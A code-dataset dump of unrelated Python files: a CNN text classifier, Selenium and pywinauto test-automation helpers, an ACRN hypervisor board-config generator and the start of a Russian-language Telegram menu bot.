a = await fa(0)
except Exception as err:
print(err)
a = asyncrun(downloadPath(1))
``` |
{
"source": "Johnxjp/cnn_text_classification",
"score": 3
} |
#### File: Johnxjp/cnn_text_classification/cnn.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from softmax import Softmax
class YKCNNClassifier(nn.Module):
def __init__(
self,
vocabulary_size,
max_seq_length,
output_dims=2,
out_channels=100,
embed_dim=300,
padding_idx=0,
kernel_heights=[3, 4, 5],
hidden_dims=[],
fc_dropout=0,
embedding_matrix=None,
freeze_embedding_layer=True,
):
super().__init__()
self.out_channels = out_channels
self.in_channels = 1
self.n_kernels = len(kernel_heights)
self.pool_sizes = [(max_seq_length - K, 1) for K in kernel_heights]
self.max_seq_length = max_seq_length
self.hidden_dims = hidden_dims
self.output_dims = output_dims
# Assumes vocab size is same as embedding matrix size. Therefore should
# contain special tokens e.g. <pad>
self.embedding = nn.Embedding(
vocabulary_size, embed_dim, padding_idx=padding_idx
)
if embedding_matrix is not None:
# Load pre-trained weights. Should be torch FloatTensor
self.embedding.from_pretrained(embedding_matrix)
if freeze_embedding_layer:
self.embedding.weight.requires_grad = False
self.convs = nn.ModuleList(
[
nn.Conv2d(
self.in_channels,
self.out_channels,
kernel_size=(K, embed_dim),
)
for K in kernel_heights
]
)
self.pools = nn.ModuleList(
[
nn.MaxPool2d(kernel_size=pool_size)
for pool_size in self.pool_sizes
]
)
self.fc = Softmax(
input_dim=self.out_channels * self.n_kernels,
hidden_dims=self.hidden_dims,
output_dim=self.output_dims,
dropout=fc_dropout,
)
def forward(self, x):
"""
x: (batch_size, max_sequence_length)
"""
batch_size = x.size(0)
assert x.size(1) == self.max_seq_length
# (batch, max_sequenece_length, embedding_dim)
x = self.embedding(x)
# adds input channel
# (batch, 1, max_sequence_length, embedding_dim)
x = x.unsqueeze(dim=1)
out_tensors = []
for (conv, pool) in zip(self.convs, self.pools):
activation = pool(F.relu(conv(x)))
out_tensors.append(activation)
# Output from conv and pooling operation will be of size
# (batch_size, out * n_kernels, 1, 1)
x = torch.cat(out_tensors, dim=1)
# Reshape to pass into fully connected
x = x.view(batch_size, -1)
return self.fc(x)
def predict(self, x):
with torch.no_grad():
return F.softmax(self.forward(x), dim=1)
def predict_classes(self, x):
predictions = self.predict(x)
return torch.argmax(predictions, dim=1)
``` |
{
"source": "johnxthekid/AutomationFramework",
"score": 2
} |
#### File: browsers/drivermanagers/BrowserManager.py
```python
import sys
from os import path
sys.path.append(path.join(path.dirname(__file__), "..", "..", ".."))
import uuid
from robot.api import logger
from selenium.webdriver.chrome.options import Options
from lib.browsers.drivermanagers.ChromeManager import ChromeManager
from lib.browsers.drivermanagers.EdgeManager import EdgeManager
from lib.browsers.drivermanagers.FirefoxManager import FirefoxManager
chrome = "chrome"
edge = "edge"
firefox = "firefox"
class BrowserSetup:
_driver = None
@classmethod
def _init_browser(cls, browser_type, driver_location=None, new_options=None):
browser_list = {chrome: ChromeManager, edge: EdgeManager, firefox: FirefoxManager}
# if cls._driver is None:
_browser = browser_list.get(browser_type, None)
if _browser is None:
raise AttributeError(f"incorrect browser type provide: {browser_type}")
return _browser(driver_location, new_options).open_browser()
# return cls._driver
class BrowserManager:
__BROWSER_INSTANCES = {}
def __init__(self):
logger.info("Browser Manager set")
@staticmethod
def open_browser(browser=None, driver_location=None, new_options=None):
if browser is None:
raise AttributeError(f"Please specify one of the following browsers to initialize: \n{chrome, edge, firefox}")
else:
return BrowserManager.set_browser_instance(browser, driver_location, new_options)
@staticmethod
def set_browser_instance(browser, driver_location=None, new_options=None):
browser_instance = BrowserSetup._init_browser(browser, driver_location, new_options=new_options)
browser_id = str(uuid.uuid1())
BrowserManager.__BROWSER_INSTANCES.update({browser_id: browser_instance})
return browser_id, browser_instance
@staticmethod
def delele_browser_instance(browser_id):
del BrowserManager.__BROWSER_INSTANCES[browser_id]
@staticmethod
def get_browser_instance(browser_id):
logger.info(f"brower id: {browser_id}")
logger.debug(f"browser list: {BrowserManager.__BROWSER_INSTANCES}")
browser = BrowserManager.__BROWSER_INSTANCES.get(browser_id, None)
logger.info(f"Browser instance: {browser}")
return browser
def open_page(self, browser_id, url):
browser = self.get_browser_instance(browser_id)
browser.get(url)
def close_browser(self, browser_id=None):
browser = self.get_browser_instance(browser_id)
browser.quit()
self.delele_browser_instance(browser_id)
def get_page_title(self, browser_id):
browser = self.get_browser_instance(browser_id)
return browser.title
```
#### File: browsers/pageobjectmodels/DemoMainPage.py
```python
import sys
from os import path
sys.path.append(path.join(path.dirname(__file__), "..", "..", ".."))
from robot.api import logger
from lib.browsers.drivermanagers.BrowserManager import BrowserManager
from lib.browsers.drivermanagers.BrowserElementActions import ElementActions
from config.browserproperties.demopage_properties import *
class DemoMainPage:
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
_browser_manager = None
def __init__(self, driver):
self.element = ElementActions(driver)
# @staticmethod
# def open_browser(browser):
# browser_id = BrowserManager.open_browser(browser)
# return browser_id
def select_departure_city(self, browser_id, city):
# driver = self._browser_manager.get_browser_instance(browser_id)
departure_city_field = self.element.get(departure_city)
departure_city_field.select.select_by_value(city)
def select_destination_city(self, browser_id, city):
# driver = self._browser_manager.get_browser_instance(browser_id)
destination_city_field = self.element.get(destination_city)
destination_city_field.select.select_by_value(city)
def search_for_flights(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
self.element.get(search_flight_button).click()
def get_flight_results(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
flights = self.element.get(flight_result_table, many=True)
return [flight.text for flight in flights.element]
# def open_page(self, browser_id, url):
# driver = self._browser_manager.get_browser_instance(browser_id)
# driver.get(url)
# def get_page_title(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
# return driver.title
# def close_browser(self, browser_id):
# driver = self._browser_manager.get_browser_instance(browser_id)
# driver.close()
# self._browser_manager.delele_browser_instance(browser_id)
if __name__ == '__main__':
# pass
bm = BrowserManager()
browser_id, driver = bm.open_browser('chrome')
driver.get("http://blazedemo.com/")
print(bm.get_page_title(browser_id=browser_id))
demo = DemoMainPage(driver=driver)
demo.select_departure_city(browser_id, 'Paris')
demo.select_destination_city(browser_id, 'London')
demo.search_for_flights(browser_id)
print(demo.get_flight_results(browser_id))
bm.close_browser(browser_id)
```
#### File: frontend/appmanagers/WinAppManager.py
```python
from os import environ
from sys import path
from pywinauto.application import Application
from pywinauto import Desktop
from pywinauto.timings import wait_until, TimeoutError
from pywinauto.findwindows import ElementNotFoundError, find_windows, WindowNotFoundError
from retrying import retry
from tempfile import NamedTemporaryFile
import uuid
import logging
log = logging.getLogger(__name__)
class WinAppManager:
UIA = "uia"
WIN32 = "win32"
EXISTING_APP_PROCESS = []
APP_INSTANCES = {}
def __init__(self, app_type="uia"):
'''
Class to initialized the main application for automation
:param app_type: the backend type for the application UIA or WIN32
'''
self.app = Application(backend=app_type)
self.desktop_app = Desktop(backend=app_type)
def open_app(self, app_location, app_name=None, timeout=None, retry_value=None):
"""
Opens the application to be tested
:param app_location: Location of the application to automate
:param app_name: Window text property name of the application
:param timeout: time out value before retrying to launch the application
:param retry_value: number of retries to launch the application
:return: returns the application instance
"""
log.info("Starting application")
self.app.start(cmd_line=app_location, timeout=timeout, retry_interval=retry_value)
log.debug("retrieving the Application dialog")
try:
app_dlg = self.app.top_window()
app_process = self.app.process
except RuntimeError:
if app_name is not None:
log.debug("No windows found through Application. Using Desktop instead")
app_dlg = self.desktop_app[app_name]
app_process = app_dlg.element_info.process_id
else:
raise RuntimeError("No windows found through Application, Provide an app_name to connect via Desktop backend class")
app_dlg.wait('visible', timeout)
for counter in range(5):
if app_process in self.__class__.EXISTING_APP_PROCESS:
if counter == 4:
raise ElementNotFoundError("Could not get the correct Application Process")
else:
log.info(f"New application process started successfully. Process ID {self.app.process}")
break
app_id = str(uuid.uuid1())
self.__class__.EXISTING_APP_PROCESS.append(app_process)
self.APP_INSTANCES.update({app_id: app_dlg})
print(self.__class__.EXISTING_APP_PROCESS)
return app_id
@classmethod
def get_app_instance(cls, app_id):
return cls.APP_INSTANCES.get(app_id, None)
@classmethod
def delete_app_instance(cls, app_id):
del cls.APP_INSTANCES[app_id]
@retry(stop_max_attempt_number=3)
def connect_to_app(self, app_location):
'''
function that returns the instance of the Application being automated
:param app_location: location of the application to automate
:return: instance of the application under test
'''
return self.app.connect(path=app_location).top_window()
def list_desktop_windows(self):
"""
Displays list of top level windows active on the desktop
:return: Name of desktop windows
"""
return [app_window._element_info.name for app_window in self.desktop_app.windows(visible_only=True, enabled_only=True)]
@staticmethod
def get_window_dialog(app_type, handle_id):
"""
returns the window dialog for handle ID provided
:param app_type: the backend type for the applicaiton UIA or WIN32
:param handle_id: the handle ID of the application
:return: returns the dialog object for the window
"""
return Application(backend=app_type).connect(handle=handle_id).window(handle=handle_id)
def get_window_title(self, dialog_instance=None):
return self.app.top_window().window_text() if dialog_instance is None else dialog_instance.window_text()
def get_app_display_state(self):
"""
:return: the display state of the application
"""
pass
def list_dialog_children(self):
"""
:return: list of children from the dialog window
"""
return [child.window_text() for child in self.app.top_window().children()]
def list_dialog_child_windows(self, dialog_instance):
"""
List the child windows as an object
:return: Object list of child windows
"""
# todo: Finish this method to return the correct list of child windows
main_lst = NamedTemporaryFile()
# main_lst.write()
main_lst.close()
main_dlg.print_control_identifiers(filename=main_lst.name)
child_list2 = []
final_lst = {}
with open(main_lst.name, 'r') as main_child:
child_list = [line for line in main_child if 'child_window' in line]
child_level = child_list.count('|')
for n_window in child_list:
child_list2.append(n_window[n_window.find('(') + 1: n_window.find(')') - 1])
for index, n_window2 in enumerate(child_list2):
_a = n_window2.split(',')
for _b in _a:
_c = _b.split('=')
final_lst.update({f'child{index}': {_c[0]: _c[1]}})
return final_lst
@staticmethod
def list_dialog_menu(dialog_instance):
"""
List the top level menus for the current window dialog
:param dialog_instance: dialog instance for the current window
:return:
"""
return [menu['text'] for menu in dialog_instance.menu_items()]
def list_dialog_menu_submenu(self, dialog_instance, menu_name):
"""
List the sub menus for the current window dialog
:param dialog_instance: dialog instance for the current window
:param menu_name: Top level menu name
:return:
"""
top_menus = self.__class__.list_dialog_menu(dialog_instance)
if menu_name in top_menus:
return [subs['text'] for subs in dialog_instance.menu_items()[top_menus.index(menu_name)]['menu_items']['menu_items']]
else:
raise ElementNotFoundError(f"{menu_name} does not exist in the current list of menus below:\n{top_menus}")
def get_clean_menus(self, menu_list):
"""
removes the special characters from the menu name
:param dialog_instance: dialog instance for the current window
:param menu_list: List of menus
:return:
"""
temp_m = [m_clean.replace("&", "") for m_clean in menu_list]
sub_menu_clean = [sub_value.split("\t")[0] for sub_value in temp_m]
return sub_menu_clean
def remove_app_process(self, app_process_id):
"""
Removes the specified application instance
:param app_process_id: process id of the application instance to be removed
:return:
"""
pass
def get_new_window_dialog(self):
"""
Returns the dialog of the application being automated
:return: Dialog object of the new page in the application
"""
# todo: add a new method that provides the name of the new dialog
return self.app[self.app.top_window().window_text()]
@staticmethod
def get_app_handle(app_instance):
"""
returns the handle id for the application instance being automated
:param app_instance: the instance that is being automated
:return: handle_id of the application
"""
return app_instance.wrapper_object().handle
@staticmethod
def get_app_process(dialog_instance):
"""
returns the process id for the application instance being automated
:param dialog_instance: the instance of the dialog for the application
:return: process_id of the application
"""
log.info("Retrieving the application process id")
return dialog_instance.wrapper_object().process_id()
@classmethod
def get_app_handle_list(cls, app_instance=None, process_id=None):
"""
returns the list of handles found for the application instance
:param app_instance: the instance of the application running
:param process_id: the process id of the application
:return: the list of handles found
"""
if app_instance is not None:
handles = find_windows(process=cls.get_app_process(app_instance))
elif process_id is not None:
handles = find_windows(process=process_id)
else:
return AttributeError("application instance or process requires to retrieve the correct handles list")
return handles
def close_app_instance(self, app_id):
"""draw_outline("red")
closes the instance of the application provided
:param app_instance: the instance of the application running
:return: True if the application was closed successfully
"""
app_instance = cls.APP_INSTANCES.get(app_id, None)
if app_instance is None:
app_instance = self.app.top_window()
# todo: Need to remove app process from the process list
try:
if app_instance.is_visible():
app_instance.close()
else:
log.debug("Application Window was not found. Already closed")
except ElementNotFoundError:
log.debug("Application Window was not found. Already closed")
return True
if __name__ == '__main__':
app_auto = WinAppManager(WinAppManager.WIN32)
main_dlg = app_auto.open_app('Notepad.exe')
'''Each menu in Notepad is a different window'''
main_window_name = main_dlg.window_text()
print(f"now on main window: {main_window_name}")
main_dlg.menu_select("Edit -> Replace")
# main_dlg.menu_select("Format -> Font")
'''New window open with name Replace'''
# menu_window_name = app_obj.top_window().window_text()
menu_window_dlg = app_auto.get_new_window_dialog()
# app_obj[menu_window_name].Cancel.click()
print(f"now on Menu window: {menu_window_dlg.window_text()}")
menu_window_dlg.Cancel.click()
main_dlg.Edit.type_keys(f"Hi from Python interactive prompt {dir()}", with_spaces=True)
'''Get list of menu options for the application'''
# menu_names = [menu['text'] for menu in main_dlg.menu_items()]
menu_names = app_auto.list_dialog_menu(main_dlg)
print(f'Menu names: \n{menu_names}')
print(f'clean Menu: \n{app_auto.get_clean_menus(menu_names)}')
sub_menu = app_auto.list_dialog_menu_submenu(main_dlg, menu_names[0])
print(f'Submenu for {menu_names[0]}:\n{sub_menu}')
print(f'Clean Submenu: \n{app_auto.get_clean_menus(sub_menu)}')
main_dlg.menu_select("File -> Exit")
'''New window open with name Notepad'''
# file_window_name = app_obj.top_window().window_text()
file_window_dlg = app_auto.get_new_window_dialog()
print(f"now on file window: {file_window_dlg.window_text()}")
# app_obj[file_window_name].DontSave.click()
file_window_dlg.DontSave.click()
```
#### File: lib/utils/AllKeywordsLibrary.py
```python
import sys
import os
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..'))
from robot.api import logger
from lib.browsers.drivermanagers.BrowserManager import BrowserManager
from lib.frontend.apphelpers.SampleNotepadHelper import SampleNotepadHelper
from lib.browsers.pageobjectmodels.DemoMainPage import DemoMainPage
from lib.browsers.pageobjectmodels.sofi.sofi_login import SofiLoginPage
class AllKeywordsLibrary(DemoMainPage, SampleNotepadHelper, SofiLoginPage):
ROBOT_LIBRARY_SCOPE = 'GLOBAL'
_browser_manager = None
_browser = None
_browser_id = None
_driver = None
def __init__(self, run_location):
logger.info(f"Running keyword library: {run_location}")
self._browser_manager = BrowserManager()
SampleNotepadHelper.__init__(self)
def open_browser(self, browser_type, driver_location=None, options=None):
self._browser_id, self.driver = BrowserManager.open_browser(browser_type, driver_location, options)
self._browser = BrowserManager.get_browser_instance(self._browser_id)
DemoMainPage.__init__(self, self.driver)
SofiLoginPage.__init__(self, self.driver)
def open_page(self, url):
self.driver.get(url)
def get_page_title(self):
return self._browser_manager.get_page_title()
def close_browser(self):
self._browser_manager.close_browser(self._browser_id)
``` |
{
"source": "johnxwu/my-acrn",
"score": 2
} |
#### File: acrn-config/board_config/misc_cfg_h.py
```python
import common
import board_cfg_lib
import scenario_cfg_lib
MISC_CFG_HEADER = """#ifndef MISC_CFG_H
#define MISC_CFG_H"""
MISC_CFG_END = """#endif /* MISC_CFG_H */"""
class Vuart:
t_vm_id = {}
t_vuart_id = {}
v_type = {}
v_base = {}
v_irq = {}
def sos_bootarg_diff(sos_cmdlines, config):
if sos_cmdlines:
sos_len = len(sos_cmdlines)
i = 0
for sos_cmdline in sos_cmdlines:
if not sos_cmdline:
continue
i += 1
if i == 1:
if sos_len == 1:
print('#define SOS_BOOTARGS_DIFF\t"{}"'.format(sos_cmdline.strip('"')), file=config)
else:
print('#define SOS_BOOTARGS_DIFF\t"{} " \\'.format(sos_cmdline), file=config)
else:
if i < sos_len:
print('\t\t\t\t"{} "\t\\'.format(sos_cmdline), file=config)
else:
print('\t\t\t\t"{}"'.format(sos_cmdline), file=config)
def parse_boot_info():
err_dic = {}
if 'SOS_VM' in common.VM_TYPES.values():
sos_cmdlines = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "board_private", "bootargs").values())
sos_rootfs = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "board_private", "rootfs").values())
(err_dic, vuart0_dic, vuart1_dic) = scenario_cfg_lib.get_sos_vuart_settings(launch_flag=False)
else:
sos_cmdlines = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "os_config", "bootargs").values())
sos_rootfs = list(common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "os_config", "rootfs").values())
(err_dic, vuart0_dic, vuart1_dic) = scenario_cfg_lib.get_sos_vuart_settings(launch_flag=False)
return (err_dic, sos_cmdlines, sos_rootfs, vuart0_dic, vuart1_dic)
def clos_per_vm_gen(config):
clos_per_vm = {}
clos_per_vm = common.get_leaf_tag_map(
common.SCENARIO_INFO_FILE, "clos", "vcpu_clos")
for i,clos_list_i in clos_per_vm.items():
clos_config = scenario_cfg_lib.clos_assignment(clos_per_vm, i)
print("#define VM{0}_VCPU_CLOS\t\t\t{1}".format(i, clos_config['clos_map']), file=config)
def cpu_affinity_output(cpu_bits, i, config):
if "SOS_VM" == common.VM_TYPES[i]:
print("", file=config)
print("#define SOS_VM_CONFIG_CPU_AFFINITY\t{0}".format(
cpu_bits['cpu_map']), file=config)
else:
print("#define VM{0}_CONFIG_CPU_AFFINITY\t{1}".format(
i, cpu_bits['cpu_map']), file=config)
def cpu_affinity_per_vm_gen(config):
cpus_per_vm = common.get_leaf_tag_map(
common.SCENARIO_INFO_FILE, "cpu_affinity", "pcpu_id")
for vm_i,_ in common.VM_TYPES.items():
cpu_bits = scenario_cfg_lib.cpus_assignment(cpus_per_vm, vm_i)
cpu_affinity_output(cpu_bits, vm_i, config)
print("", file=config)
def pci_dev_num_per_vm_gen(config):
pci_items = common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "pci_devs", "pci_dev")
pci_devs = scenario_cfg_lib.get_pci_devs(pci_items)
pci_dev_num = scenario_cfg_lib.get_pci_num(pci_devs)
ivshmem_region = common.get_hv_item_tag(common.SCENARIO_INFO_FILE,
"FEATURES", "IVSHMEM", "IVSHMEM_REGION")
shmem_enabled = common.get_hv_item_tag(common.SCENARIO_INFO_FILE,
"FEATURES", "IVSHMEM", "IVSHMEM_ENABLED")
shmem_regions = scenario_cfg_lib.get_shmem_regions(ivshmem_region)
shmem_num = scenario_cfg_lib.get_shmem_num(shmem_regions)
for vm_i,vm_type in common.VM_TYPES.items():
if "POST_LAUNCHED_VM" == scenario_cfg_lib.VM_DB[vm_type]['load_type']:
if shmem_enabled == 'y' and vm_i in shmem_num.keys():
print("#define VM{}_CONFIG_PCI_DEV_NUM\t{}U".format(vm_i, shmem_num[vm_i]), file=config)
elif "PRE_LAUNCHED_VM" == scenario_cfg_lib.VM_DB[vm_type]['load_type']:
shmem_num_i = 0
if shmem_enabled == 'y' and vm_i in shmem_num.keys():
shmem_num_i = shmem_num[vm_i]
print("#define VM{}_CONFIG_PCI_DEV_NUM\t{}U".format(vm_i, pci_dev_num[vm_i] + shmem_num_i), file=config)
print("", file=config)
def split_cmdline(cmd_str, config):
cmd_list = [i for i in cmd_str.strip('"').split()]
if not cmd_list: return
last_idx = len(cmd_list) - 1
for idx, cmd_arg in enumerate(cmd_list):
if idx == 0:
print('"', end="", file=config)
elif idx % 4 == 0:
print("\\\n", end="", file=config)
if idx == last_idx:
print('{}"'.format(cmd_arg), file=config)
else:
print('{} '.format(cmd_arg), end="", file=config)
def boot_args_per_vm_gen(config):
kern_args = common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "os_config", "bootargs")
for vm_i,vm_type in common.VM_TYPES.items():
if "PRE_LAUNCHED_VM" == scenario_cfg_lib.VM_DB[vm_type]['load_type']:
if vm_i in kern_args.keys() and kern_args[vm_i]:
print("#define VM{}_BOOT_ARGS\t".format(vm_i), end="", file=config)
split_cmdline(kern_args[vm_i].strip(), config)
print("", file=config)
print("", file=config)
def pt_intx_num_vm0_gen(config):
phys_gsi, virt_gsi = common.get_pt_intx_table(common.SCENARIO_INFO_FILE)
if (board_cfg_lib.is_matched_board(("ehl-crb-b"))
and phys_gsi.get(0) is not None
and len(phys_gsi[0]) > 0):
print("#define VM0_PT_INTX_NUM\t{}U".format(len(phys_gsi[0])), file=config)
else:
print("#define VM0_PT_INTX_NUM\t0U", file=config)
print("", file=config)
def generate_file(config):
"""
Start to generate board.c
:param config: it is a file pointer of board information for writing to
"""
board_cfg_lib.get_valid_irq(common.BOARD_INFO_FILE)
# get the vuart0/vuart1 which user chosed from scenario.xml of board_private section
(err_dic, ttys_n) = board_cfg_lib.parser_hv_console()
if err_dic:
return err_dic
# parse sos_bootargs/rootfs/console
(err_dic, sos_cmdlines, sos_rootfs, vuart0_dic, vuart1_dic) = parse_boot_info()
if err_dic:
return err_dic
if vuart0_dic:
# parse to get poart/base of vuart0/vuart1
vuart0_port_base = board_cfg_lib.LEGACY_TTYS[list(vuart0_dic.keys())[0]]
vuart0_irq = vuart0_dic[list(vuart0_dic.keys())[0]]
vuart1_port_base = board_cfg_lib.LEGACY_TTYS[list(vuart1_dic.keys())[0]]
vuart1_irq = vuart1_dic[list(vuart1_dic.keys())[0]]
# parse the setting ttys vuatx dic: {vmid:base/irq}
vuart0_setting = Vuart()
vuart1_setting = Vuart()
vuart0_setting = common.get_vuart_info_id(common.SCENARIO_INFO_FILE, 0)
vuart1_setting = common.get_vuart_info_id(common.SCENARIO_INFO_FILE, 1)
# sos command lines information
sos_cmdlines = [i for i in sos_cmdlines[0].split() if i != '']
# add maxcpus parameter into sos cmdlines if there are pre-launched VMs
pcpu_list = board_cfg_lib.get_processor_info()
cpu_affinity = common.get_leaf_tag_map(common.SCENARIO_INFO_FILE, "cpu_affinity", "pcpu_id")
pre_cpu_list = []
sos_cpu_num = 0
for vmid, cpu_list in cpu_affinity.items():
if vmid in common.VM_TYPES and cpu_list != [None]:
vm_type = common.VM_TYPES[vmid]
load_type = ''
if vm_type in scenario_cfg_lib.VM_DB:
load_type = scenario_cfg_lib.VM_DB[vm_type]['load_type']
if load_type == "PRE_LAUNCHED_VM":
pre_cpu_list += cpu_list
elif load_type == "SOS_VM":
sos_cpu_num += len(cpu_list)
if sos_cpu_num == 0:
sos_cpu_num_max = len(list(set(pcpu_list) - set(pre_cpu_list)))
else:
sos_cpu_num_max = sos_cpu_num
if sos_cpu_num_max > 0:
sos_cmdlines.append('maxcpus='+str(sos_cpu_num_max))
# get native rootfs list from board_info.xml
(root_devs, root_dev_num) = board_cfg_lib.get_rootfs(common.BOARD_INFO_FILE)
# start to generate misc_cfg.h
print("{0}".format(board_cfg_lib.HEADER_LICENSE), file=config)
print("{}".format(MISC_CFG_HEADER), file=config)
print("", file=config)
# define rootfs with macro
#for i in range(root_dev_num):
# print('#define ROOTFS_{}\t\t"root={} "'.format(i, root_devs[i]), file=config)
# sos rootfs and console
if "SOS_VM" in common.VM_TYPES.values():
print('#define SOS_ROOTFS\t\t"root={} "'.format(sos_rootfs[0]), file=config)
if ttys_n:
print('#define SOS_CONSOLE\t\t"console={} "'.format(ttys_n), file=config)
else:
print('#define SOS_CONSOLE\t\t" "', file=config)
# sos com base/irq
i_type = 0
for vm_i,vm_type in common.VM_TYPES.items():
if vm_type == "SOS_VM":
i_type = vm_i
break
if "SOS_VM" in common.VM_TYPES.values():
if vuart0_dic:
print("#define SOS_COM1_BASE\t\t{}U".format(vuart0_port_base), file=config)
print("#define SOS_COM1_IRQ\t\t{}U".format(vuart0_irq), file=config)
else:
print("#define SOS_COM1_BASE\t\t0U", file=config)
print("#define SOS_COM1_IRQ\t\t0U", file=config)
if vuart1_setting[i_type]['base'] != "INVALID_COM_BASE":
print("#define SOS_COM2_BASE\t\t{}U".format(vuart1_port_base), file=config)
print("#define SOS_COM2_IRQ\t\t{}U".format(vuart1_irq), file=config)
# sos boot command line
print("", file=config)
if "SOS_VM" in common.VM_TYPES.values():
sos_bootarg_diff(sos_cmdlines, config)
print("", file=config)
cpu_affinity_per_vm_gen(config)
common_clos_max = board_cfg_lib.get_common_clos_max()
max_mba_clos_entries = common_clos_max
max_cache_clos_entries = common_clos_max
comments_max_clos = '''
/*
* The maximum CLOS that is allowed by ACRN hypervisor,
* its value is set to be least common Max CLOS (CPUID.(EAX=0x10,ECX=ResID):EDX[15:0])
* among all supported RDT resources in the platform. In other words, it is
* min(maximum CLOS of L2, L3 and MBA). This is done in order to have consistent
* CLOS allocations between all the RDT resources.
*/'''
comments_max_mba_clos = '''
/*
* Max number of Cache Mask entries corresponding to each CLOS.
* This can vary if CDP is enabled vs disabled, as each CLOS entry
* will have corresponding cache mask values for Data and Code when
* CDP is enabled.
*/'''
comments_max_cache_clos = '''
/* Max number of MBA delay entries corresponding to each CLOS. */'''
if board_cfg_lib.is_cdp_enabled():
max_cache_clos_entries_cdp_enable = 2 * common_clos_max
(res_info, rdt_res_clos_max, clos_max_mask_list) = board_cfg_lib.clos_info_parser(common.BOARD_INFO_FILE)
common_clos_max_cdp_disable = min(rdt_res_clos_max)
print("#ifdef CONFIG_RDT_ENABLED", file=config)
print("#ifdef CONFIG_CDP_ENABLED", file=config)
print(comments_max_clos, file=config)
print("#define HV_SUPPORTED_MAX_CLOS\t{}U".format(common_clos_max), file=config)
print(comments_max_cache_clos, file=config)
print("#define MAX_CACHE_CLOS_NUM_ENTRIES\t{}U".format(max_cache_clos_entries_cdp_enable), file=config)
print("#else", file=config)
print(comments_max_clos, file=config)
print("#define HV_SUPPORTED_MAX_CLOS\t{}U".format(common_clos_max_cdp_disable), file=config)
print(comments_max_cache_clos, file=config)
print("#define MAX_CACHE_CLOS_NUM_ENTRIES\t{}U".format(max_cache_clos_entries), file=config)
print("#endif", file=config)
print(comments_max_mba_clos, file=config)
print("#define MAX_MBA_CLOS_NUM_ENTRIES\t{}U".format(max_mba_clos_entries), file=config)
else:
print("#ifdef CONFIG_RDT_ENABLED", file=config)
print(comments_max_clos, file=config)
print("#define HV_SUPPORTED_MAX_CLOS\t{}U".format(common_clos_max), file=config)
print(comments_max_mba_clos, file=config)
print("#define MAX_MBA_CLOS_NUM_ENTRIES\t{}U".format(max_mba_clos_entries), file=config)
print(comments_max_cache_clos, file=config)
print("#define MAX_CACHE_CLOS_NUM_ENTRIES\t{}U".format(max_cache_clos_entries), file=config)
if not board_cfg_lib.is_rdt_supported():
print("#endif", file=config)
print("", file=config)
if board_cfg_lib.is_rdt_supported():
(rdt_resources, rdt_res_clos_max, _) = board_cfg_lib.clos_info_parser(common.BOARD_INFO_FILE)
cat_mask_list = common.get_hv_item_tag(common.SCENARIO_INFO_FILE, "FEATURES", "RDT", "CLOS_MASK")
mba_delay_list = common.get_hv_item_tag(common.SCENARIO_INFO_FILE, "FEATURES", "RDT", "MBA_DELAY")
idx = 0
for mba_delay_mask in mba_delay_list:
print("#define MBA_MASK_{}\t\t\t{}U".format(idx, mba_delay_mask), file=config)
idx += 1
idx = 0
for cat_mask in cat_mask_list:
print("#define CLOS_MASK_{}\t\t\t{}U".format(idx, cat_mask), file=config)
idx += 1
print("", file=config)
clos_per_vm_gen(config)
print("#endif", file=config)
print("", file=config)
vm0_pre_launch = False
common.get_vm_types()
for vm_idx,vm_type in common.VM_TYPES.items():
if vm_idx == 0 and scenario_cfg_lib.VM_DB[vm_type]['load_type'] == "PRE_LAUNCHED_VM":
vm0_pre_launch = True
if vm0_pre_launch and board_cfg_lib.is_tpm_passthru():
print("#define VM0_PASSTHROUGH_TPM", file=config)
print("#define VM0_TPM_BUFFER_BASE_ADDR 0xFED40000UL", file=config)
gpa = common.hpa2gpa(0, 0xFED40000, 0x5000)
print("#define VM0_TPM_BUFFER_BASE_ADDR_GPA 0x{:X}UL".format(gpa), file=config)
print("#define VM0_TPM_BUFFER_SIZE 0x5000UL", file=config)
print("", file=config)
pci_dev_num_per_vm_gen(config)
boot_args_per_vm_gen(config)
pt_intx_num_vm0_gen(config)
print("{}".format(MISC_CFG_END), file=config)
return err_dic
``` |
{
"source": "JOHNY2308/personalmate",
"score": 2
} |
#### File: JOHNY2308/personalmate/bot.py
```python
import os
import telebot
from telebot import types
import const
from geopy.distance import vincenty
# Example of your code beginning
# Config vars
token = os.environ['TELEGRAM_TOKEN']
# Your bot code below
bot = telebot.TeleBot(token)
markup_menu = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)
btn_address = types.KeyboardButton('🍔 Ближайший Burger Heroes', request_location=True)
btn_payment = types.KeyboardButton('💵 Способы оплаты')
btn_delivery = types.KeyboardButton('🚗 Способы доставки')
btn_games = types.KeyboardButton('🎮 Игры')
markup_menu.add(btn_address, btn_payment, btn_delivery, btn_games)
markup_menu2 = types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)
btn_game1 = types.KeyboardButton('Игра 1')
btn_game2 = types.KeyboardButton('Игра 2')
btn_game3 = types.KeyboardButton('Игра 3')
btn_back = types.KeyboardButton('⬅ Назад')
markup_menu2.add(btn_game1, btn_game2, btn_game3, btn_back)
markup_inline_payment = types.InlineKeyboardMarkup(row_width=1)
btn_in_cash = types.InlineKeyboardButton('Наличные', callback_data='cash')
btn_in_card = types.InlineKeyboardButton('По карте', callback_data='card')
btn_in_invoice = types.InlineKeyboardButton('Банковский перевод', callback_data='invoice')
markup_inline_payment.add(btn_in_cash, btn_in_card, btn_in_invoice)
@bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
bot.send_message(message.chat.id, "Привет! Я супербот. Жми на кнопки", reply_markup=markup_menu)
@bot.message_handler(func=lambda message: True)
def echo_all(message):
if message.text == "🚗 Способы доставки":
bot.reply_to(message, "Курьерская доставка!", reply_markup=markup_menu)
elif message.text == "🎮 Игры":
bot.send_message(message.chat.id, "В какую игру вы хотите сыграть?", reply_markup=markup_menu2)
elif message.text == "💵 Способы оплаты":
bot.send_message(message.chat.id, "Вы можете оплатить разными способами! ",
reply_markup=markup_inline_payment)
